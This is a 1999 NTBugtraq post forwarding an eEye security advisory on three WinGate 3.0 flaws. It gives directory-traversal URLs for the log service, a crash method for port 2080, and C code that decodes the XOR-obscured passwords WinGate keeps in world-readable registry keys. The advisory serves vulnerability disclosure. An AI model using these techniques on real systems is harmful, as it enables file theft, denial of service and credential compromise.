Date: Mon, 5 Apr 1999 17:52:51 -0700
From: Marc <Marc@EEYE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Multiple WinGate Vulnerabilities[Tad late]

At first we were just going to post this advisory to our website but after
the subject came up on the NTSEC list and we got a few emails telling us to
post it to the other lists... well here it is.

Signed,
Marc
eEye Digital Security Team
http://www.eEye.com

P.S.
Go see Matrix.

________________________________________________________________________

eEye Digital Security Team <e>
www.eEye.com
info@eEye.com
February 22, 1999
________________________________________________________________________

Multiple WinGate Vulnerabilities

Systems Affected
WinGate 3.0

Release Date
February 22, 1999

Advisory Code
AD02221999

________________________________________________________________________

Description:
________________________________________________________________________

WinGate 3.0 has three vulnerabilities. Read any file on the remote system.
1. Read any file on the remote system.
2. DoS the WinGate service.
3. Decrypt WinGate passwords.

________________________________________________________________________

Read any file on the remote system
________________________________________________________________________

We were debating if we should add this to the advisory or not. We
figured it would not hurt so here it is.
The WinGate Log File service in the past has had holes were you can
read any file on the system and the holes still seem to be there and
some new ways of doing it have cropped up.

http://www.server.com:8010/c:/ - NT/Win9x
http://www.server.com:8010// - NT/Win9x
http://www.server.com:8010/..../ - Win9x

Each of the above URLs will list all files on the remote machine.
There are a few reasons why we were not sure if we were going to post
this information.

By default all WinGate services are set so that only 127.0.0.1
can use the service. However the use for the log file service is to let
users remotely view
the logs so therefore chances are people using the log file service
are not going to be leaving it on 127.0.0.1. Also by default in the
WinGate settings "Browse" is enabled. We are not sure if the developers
intended the Browse option to mean the whole hard drive. We would hope
not.

The main reason we did put this in the advisory is the fact that
the average person using WinGate (Cable Modem Users etc..) are not the
brightest of people and they will open the Log Service so that everyone
has access to it. We understand there are papers out there saying not
to do this and even the program it self says not to, but the average
person will not let this register in their head as a bad thing so the
software should at least make it as secure as possible. Letting people
read any file is not living to that standard. Any way, lets move on...
________________________________________________________________________

DoS the WinGate Service
________________________________________________________________________

The Winsock Redirector Service sits on port 2080. When you connect to it
and send 2000 characters and disconnect it will crash all WinGate
services. O Yippee

________________________________________________________________________

Decrypt the WinGate passwords
________________________________________________________________________

The registry keys where WinGate stores its passwords are insecure and
let everyone read them. Therefore anyone can get the passwords and
decrypt them. Code follows.

________________________________________________________________________

// ChrisA@eEye.com
// Mike@eEye.com

#include "stdafx.h"
#include <stdio.h>
#include <string.h>

main(int argc, char *argv[]) {
char i;

for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;

}
________________________________________________________________________

You get the idea...

It is good that WinGate 3.0 by default locks down all services to 127.0.0.1.
However, there still seems to be holes were if one gets access to the
WinGate service, non-blocked ip, they can do some damage. Chances
are if you poke hard at some of the other services you will find similar
problems as above. Software developers need to remember that the avg. user
is not all
ways the brightest so our products security must be as tight as possible.

________________________________________________________________________

Vendor Status
________________________________________________________________________

Contacted a month or so ago, have heard nothing. Someone from the NTSEC
list contact eval-support@wingate.net with our findings and they were
sent an email back rather quickly. We had sent our emails to
support@wingate.net and things of the such. Maybe all three of our
emails just got lost. The last we've heard WinGate is taking steps to fix
the problem. Look for patches soon.

________________________________________________________________________

Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________

Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

________________________________________________________________________

Disclaimer:
________________________________________________________________________

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com